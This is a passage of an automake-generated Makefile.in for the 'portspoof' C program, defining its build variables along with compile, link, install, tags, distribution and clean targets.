|
||||
am_portspoof_OBJECTS = $(am__objects_1) $(am__objects_2)
|
||||
portspoof_OBJECTS = $(am_portspoof_OBJECTS)
|
||||
portspoof_LDADD = $(LDADD)
|
||||
portspoof_LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(portspoof_LDFLAGS) \
|
||||
$(LDFLAGS) -o $@
|
||||
DEFAULT_INCLUDES = -I.@am__isrc@
|
||||
depcomp = $(SHELL) $(top_srcdir)/auto/depcomp
|
||||
am__depfiles_maybe = depfiles
|
||||
COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS) \
|
||||
$(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS)
|
||||
CCLD = $(CC)
|
||||
LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(AM_LDFLAGS) $(LDFLAGS) -o $@
|
||||
SOURCES = $(portspoof_SOURCES)
|
||||
DIST_SOURCES = $(portspoof_SOURCES)
|
||||
ETAGS = etags
|
||||
CTAGS = ctags
|
||||
DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)
|
||||
ACLOCAL = @ACLOCAL@
|
||||
AMTAR = @AMTAR@
|
||||
AUTOCONF = @AUTOCONF@
|
||||
AUTOHEADER = @AUTOHEADER@
|
||||
AUTOMAKE = @AUTOMAKE@
|
||||
AWK = @AWK@
|
||||
CC = @CC@
|
||||
CCDEPMODE = @CCDEPMODE@
|
||||
CFLAGS = @CFLAGS@
|
||||
CPP = @CPP@
|
||||
CPPFLAGS = @CPPFLAGS@
|
||||
CYGPATH_W = @CYGPATH_W@
|
||||
DEFS = @DEFS@
|
||||
DEPDIR = @DEPDIR@
|
||||
ECHO_C = @ECHO_C@
|
||||
ECHO_N = @ECHO_N@
|
||||
ECHO_T = @ECHO_T@
|
||||
EGREP = @EGREP@
|
||||
EXEEXT = @EXEEXT@
|
||||
GREP = @GREP@
|
||||
INSTALL = @INSTALL@
|
||||
INSTALL_DATA = @INSTALL_DATA@
|
||||
INSTALL_PROGRAM = @INSTALL_PROGRAM@
|
||||
INSTALL_SCRIPT = @INSTALL_SCRIPT@
|
||||
INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@
|
||||
LDFLAGS = @LDFLAGS@
|
||||
LIBOBJS = @LIBOBJS@
|
||||
LIBS = @LIBS@
|
||||
LTLIBOBJS = @LTLIBOBJS@
|
||||
MAKEINFO = @MAKEINFO@
|
||||
MKDIR_P = @MKDIR_P@
|
||||
OBJEXT = @OBJEXT@
|
||||
PACKAGE = @PACKAGE@
|
||||
PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@
|
||||
PACKAGE_NAME = @PACKAGE_NAME@
|
||||
PACKAGE_STRING = @PACKAGE_STRING@
|
||||
PACKAGE_TARNAME = @PACKAGE_TARNAME@
|
||||
PACKAGE_VERSION = @PACKAGE_VERSION@
|
||||
PATH_SEPARATOR = @PATH_SEPARATOR@
|
||||
SET_MAKE = @SET_MAKE@
|
||||
SHELL = @SHELL@
|
||||
STRIP = @STRIP@
|
||||
VERSION = @VERSION@
|
||||
abs_builddir = @abs_builddir@
|
||||
abs_srcdir = @abs_srcdir@
|
||||
abs_top_builddir = @abs_top_builddir@
|
||||
abs_top_srcdir = @abs_top_srcdir@
|
||||
ac_ct_CC = @ac_ct_CC@
|
||||
am__include = @am__include@
|
||||
am__leading_dot = @am__leading_dot@
|
||||
am__quote = @am__quote@
|
||||
am__tar = @am__tar@
|
||||
am__untar = @am__untar@
|
||||
bindir = @bindir@
|
||||
build = @build@
|
||||
build_alias = @build_alias@
|
||||
build_cpu = @build_cpu@
|
||||
build_os = @build_os@
|
||||
build_vendor = @build_vendor@
|
||||
builddir = @builddir@
|
||||
datadir = @datadir@
|
||||
datarootdir = @datarootdir@
|
||||
docdir = @docdir@
|
||||
dvidir = @dvidir@
|
||||
exec_prefix = @exec_prefix@
|
||||
host = @host@
|
||||
host_alias = @host_alias@
|
||||
host_cpu = @host_cpu@
|
||||
host_os = @host_os@
|
||||
host_vendor = @host_vendor@
|
||||
htmldir = @htmldir@
|
||||
includedir = @includedir@
|
||||
infodir = @infodir@
|
||||
install_sh = @install_sh@
|
||||
libdir = @libdir@
|
||||
libexecdir = @libexecdir@
|
||||
localedir = @localedir@
|
||||
localstatedir = @localstatedir@
|
||||
mandir = @mandir@
|
||||
mkdir_p = @mkdir_p@
|
||||
oldincludedir = @oldincludedir@
|
||||
pdfdir = @pdfdir@
|
||||
prefix = @prefix@
|
||||
program_transform_name = @program_transform_name@
|
||||
psdir = @psdir@
|
||||
sbindir = @sbindir@
|
||||
sharedstatedir = @sharedstatedir@
|
||||
srcdir = @srcdir@
|
||||
sysconfdir = @sysconfdir@
|
||||
target_alias = @target_alias@
|
||||
top_builddir = @top_builddir@
|
||||
top_srcdir = @top_srcdir@
|
||||
|
||||
# File lists
|
||||
headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
|
||||
sources = connection.c portspoof.c revregex.c log.c config_file.c
|
||||
portspoof_SOURCES = $(headers) $(sources)
|
||||
|
||||
# Threads
|
||||
portspoof_LDFLAGS = @LDFLAGS@ -pthread
|
||||
|
||||
#Preprocessor detinitions
|
||||
portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"'
|
||||
all: config.h
|
||||
$(MAKE) $(AM_MAKEFLAGS) all-am
|
||||
|
||||
.SUFFIXES:
|
||||
.SUFFIXES: .c .o .obj
|
||||
$(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps)
|
||||
@for dep in $?; do \
|
||||
case '$(am__configure_deps)' in \
|
||||
*$$dep*) \
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh \
|
||||
&& exit 0; \
|
||||
exit 1;; \
|
||||
esac; \
|
||||
done; \
|
||||
echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile'; \
|
||||
cd $(top_srcdir) && \
|
||||
$(AUTOMAKE) --gnu src/Makefile
|
||||
.PRECIOUS: Makefile
|
||||
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status
|
||||
@case '$?' in \
|
||||
*config.status*) \
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \
|
||||
*) \
|
||||
echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe)'; \
|
||||
cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__depfiles_maybe);; \
|
||||
esac;
|
||||
|
||||
$(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
|
||||
$(top_srcdir)/configure: $(am__configure_deps)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
$(ACLOCAL_M4): $(am__aclocal_m4_deps)
|
||||
cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh
|
||||
|
||||
config.h: stamp-h1
|
||||
@if test ! -f $@; then \
|
||||
rm -f stamp-h1; \
|
||||
$(MAKE) $(AM_MAKEFLAGS) stamp-h1; \
|
||||
else :; fi
|
||||
|
||||
stamp-h1: $(srcdir)/config.h.in $(top_builddir)/config.status
|
||||
@rm -f stamp-h1
|
||||
cd $(top_builddir) && $(SHELL) ./config.status src/config.h
|
||||
$(srcdir)/config.h.in: $(am__configure_deps)
|
||||
cd $(top_srcdir) && $(AUTOHEADER)
|
||||
rm -f stamp-h1
|
||||
touch $@
|
||||
|
||||
distclean-hdr:
|
||||
-rm -f config.h stamp-h1
|
||||
install-binPROGRAMS: $(bin_PROGRAMS)
|
||||
@$(NORMAL_INSTALL)
|
||||
test -z "$(bindir)" || $(MKDIR_P) "$(DESTDIR)$(bindir)"
|
||||
@list='$(bin_PROGRAMS)'; for p in $$list; do \
|
||||
p1=`echo $$p|sed 's/$(EXEEXT)$$//'`; \
|
||||
if test -f $$p \
|
||||
; then \
|
||||
f=`echo "$$p1" | sed 's,^.*/,,;$(transform);s/$$/$(EXEEXT)/'`; \
|
||||
echo " $(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) '$$p' '$(DESTDIR)$(bindir)/$$f'"; \
|
||||
$(INSTALL_PROGRAM_ENV) $(binPROGRAMS_INSTALL) "$$p" "$(DESTDIR)$(bindir)/$$f" || exit 1; \
|
||||
else :; fi; \
|
||||
done
|
||||
|
||||
uninstall-binPROGRAMS:
|
||||
@$(NORMAL_UNINSTALL)
|
||||
@list='$(bin_PROGRAMS)'; for p in $$list; do \
|
||||
f=`echo "$$p" | sed 's,^.*/,,;s/$(EXEEXT)$$//;$(transform);s/$$/$(EXEEXT)/'`; \
|
||||
echo " rm -f '$(DESTDIR)$(bindir)/$$f'"; \
|
||||
rm -f "$(DESTDIR)$(bindir)/$$f"; \
|
||||
done
|
||||
|
||||
clean-binPROGRAMS:
|
||||
-test -z "$(bin_PROGRAMS)" || rm -f $(bin_PROGRAMS)
|
||||
portspoof$(EXEEXT): $(portspoof_OBJECTS) $(portspoof_DEPENDENCIES)
|
||||
@rm -f portspoof$(EXEEXT)
|
||||
$(portspoof_LINK) $(portspoof_OBJECTS) $(portspoof_LDADD) $(LIBS)
|
||||
|
||||
mostlyclean-compile:
|
||||
-rm -f *.$(OBJEXT)
|
||||
|
||||
distclean-compile:
|
||||
-rm -f *.tab.c
|
||||
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-config_file.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-connection.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-log.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-portspoof.Po@am__quote@
|
||||
@AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/portspoof-revregex.Po@am__quote@
|
||||
|
||||
.c.o:
|
||||
@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ $<
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(COMPILE) -c $<
|
||||
|
||||
.c.obj:
|
||||
@am__fastdepCC_TRUE@ $(COMPILE) -MT $@ -MD -MP -MF $(DEPDIR)/$*.Tpo -c -o $@ `$(CYGPATH_W) '$<'`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/$*.Tpo $(DEPDIR)/$*.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='$<' object='$@' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(COMPILE) -c `$(CYGPATH_W) '$<'`
|
||||
|
||||
portspoof-connection.o: connection.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.o -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.o `test -f 'connection.c' || echo '$(srcdir)/'`connection.c
|
||||
|
||||
portspoof-connection.obj: connection.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-connection.obj -MD -MP -MF $(DEPDIR)/portspoof-connection.Tpo -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-connection.Tpo $(DEPDIR)/portspoof-connection.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='connection.c' object='portspoof-connection.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-connection.obj `if test -f 'connection.c'; then $(CYGPATH_W) 'connection.c'; else $(CYGPATH_W) '$(srcdir)/connection.c'; fi`
|
||||
|
||||
portspoof-portspoof.o: portspoof.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.o -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.o `test -f 'portspoof.c' || echo '$(srcdir)/'`portspoof.c
|
||||
|
||||
portspoof-portspoof.obj: portspoof.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-portspoof.obj -MD -MP -MF $(DEPDIR)/portspoof-portspoof.Tpo -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-portspoof.Tpo $(DEPDIR)/portspoof-portspoof.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='portspoof.c' object='portspoof-portspoof.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-portspoof.obj `if test -f 'portspoof.c'; then $(CYGPATH_W) 'portspoof.c'; else $(CYGPATH_W) '$(srcdir)/portspoof.c'; fi`
|
||||
|
||||
portspoof-revregex.o: revregex.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.o -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.o `test -f 'revregex.c' || echo '$(srcdir)/'`revregex.c
|
||||
|
||||
portspoof-revregex.obj: revregex.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-revregex.obj -MD -MP -MF $(DEPDIR)/portspoof-revregex.Tpo -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-revregex.Tpo $(DEPDIR)/portspoof-revregex.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='revregex.c' object='portspoof-revregex.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-revregex.obj `if test -f 'revregex.c'; then $(CYGPATH_W) 'revregex.c'; else $(CYGPATH_W) '$(srcdir)/revregex.c'; fi`
|
||||
|
||||
portspoof-log.o: log.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.o -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.o `test -f 'log.c' || echo '$(srcdir)/'`log.c
|
||||
|
||||
portspoof-log.obj: log.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-log.obj -MD -MP -MF $(DEPDIR)/portspoof-log.Tpo -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-log.Tpo $(DEPDIR)/portspoof-log.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='log.c' object='portspoof-log.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-log.obj `if test -f 'log.c'; then $(CYGPATH_W) 'log.c'; else $(CYGPATH_W) '$(srcdir)/log.c'; fi`
|
||||
|
||||
portspoof-config_file.o: config_file.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.o -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.o' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.o `test -f 'config_file.c' || echo '$(srcdir)/'`config_file.c
|
||||
|
||||
portspoof-config_file.obj: config_file.c
|
||||
@am__fastdepCC_TRUE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -MT portspoof-config_file.obj -MD -MP -MF $(DEPDIR)/portspoof-config_file.Tpo -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
|
||||
@am__fastdepCC_TRUE@ mv -f $(DEPDIR)/portspoof-config_file.Tpo $(DEPDIR)/portspoof-config_file.Po
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ source='config_file.c' object='portspoof-config_file.obj' libtool=no @AMDEPBACKSLASH@
|
||||
@AMDEP_TRUE@@am__fastdepCC_FALSE@ DEPDIR=$(DEPDIR) $(CCDEPMODE) $(depcomp) @AMDEPBACKSLASH@
|
||||
@am__fastdepCC_FALSE@ $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(portspoof_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS) -c -o portspoof-config_file.obj `if test -f 'config_file.c'; then $(CYGPATH_W) 'config_file.c'; else $(CYGPATH_W) '$(srcdir)/config_file.c'; fi`
|
||||
|
||||
ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES)
|
||||
list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
mkid -fID $$unique
|
||||
tags: TAGS
|
||||
|
||||
TAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
|
||||
$(TAGS_FILES) $(LISP)
|
||||
tags=; \
|
||||
here=`pwd`; \
|
||||
list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
if test -z "$(ETAGS_ARGS)$$tags$$unique"; then :; else \
|
||||
test -n "$$unique" || unique=$$empty_fix; \
|
||||
$(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \
|
||||
$$tags $$unique; \
|
||||
fi
|
||||
ctags: CTAGS
|
||||
CTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \
|
||||
$(TAGS_FILES) $(LISP)
|
||||
tags=; \
|
||||
here=`pwd`; \
|
||||
list='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \
|
||||
unique=`for i in $$list; do \
|
||||
if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \
|
||||
done | \
|
||||
$(AWK) ' { files[$$0] = 1; } \
|
||||
END { for (i in files) print i; }'`; \
|
||||
test -z "$(CTAGS_ARGS)$$tags$$unique" \
|
||||
|| $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \
|
||||
$$tags $$unique
|
||||
|
||||
GTAGS:
|
||||
here=`$(am__cd) $(top_builddir) && pwd` \
|
||||
&& cd $(top_srcdir) \
|
||||
&& gtags -i $(GTAGS_ARGS) $$here
|
||||
|
||||
distclean-tags:
|
||||
-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags
|
||||
|
||||
distdir: $(DISTFILES)
|
||||
@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
|
||||
topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
|
||||
list='$(DISTFILES)'; \
|
||||
dist_files=`for file in $$list; do echo $$file; done | \
|
||||
sed -e "s|^$$srcdirstrip/||;t" \
|
||||
-e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \
|
||||
case $$dist_files in \
|
||||
*/*) $(MKDIR_P) `echo "$$dist_files" | \
|
||||
sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \
|
||||
sort -u` ;; \
|
||||
esac; \
|
||||
for file in $$dist_files; do \
|
||||
if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \
|
||||
if test -d $$d/$$file; then \
|
||||
dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
|
||||
if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
|
||||
cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \
|
||||
fi; \
|
||||
cp -pR $$d/$$file $(distdir)$$dir || exit 1; \
|
||||
else \
|
||||
test -f $(distdir)/$$file \
|
||||
|| cp -p $$d/$$file $(distdir)/$$file \
|
||||
|| exit 1; \
|
||||
fi; \
|
||||
done
|
||||
check-am: all-am
|
||||
check: check-am
|
||||
all-am: Makefile $(PROGRAMS) config.h
|
||||
installdirs:
|
||||
for dir in "$(DESTDIR)$(bindir)"; do \
|
||||
test -z "$$dir" || $(MKDIR_P) "$$dir"; \
|
||||
done
|
||||
install: install-am
|
||||
install-exec: install-exec-am
|
||||
install-data: install-data-am
|
||||
uninstall: uninstall-am
|
||||
|
||||
install-am: all-am
|
||||
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
|
||||
|
||||
installcheck: installcheck-am
|
||||
install-strip:
|
||||
$(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \
|
||||
install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \
|
||||
`test -z '$(STRIP)' || \
|
||||
echo "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'"` install
|
||||
mostlyclean-generic:
|
||||
|
||||
clean-generic:
|
||||
|
||||
distclean-generic:
|
||||
-test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES)
|
||||
|
||||
maintainer-clean-generic:
|
||||
@echo "This command is intended for maintainers to use"
|
||||
@echo "it deletes files that may require special tools to rebuild."
|
||||
clean: clean-am
|
||||
|
||||
clean-am: clean-binPROGRAMS clean-generic mostlyclean-am
|
||||
|
||||
distclean: distclean-am
|
||||
-rm -rf ./$(DEPDIR)
|
||||
-rm -f Makefile
|
||||
distclean-am: clean-am distclean-compile distclean-generic \
|
||||
distclean-hdr distclean-tags
|
||||
|
||||
dvi: dvi-am
|
||||
|
||||
dvi-am:
|
||||
|
||||
html: html-am
|
||||
|
||||
info: info-am
|
||||
|
||||
info-am:
|
||||
|
||||
install-data-am:
|
||||
|
||||
install-dvi: install-dvi-am
|
||||
|
||||
install-exec-am: install-binPROGRAMS
|
||||
|
||||
install-html: install-html-am
|
||||
|
||||
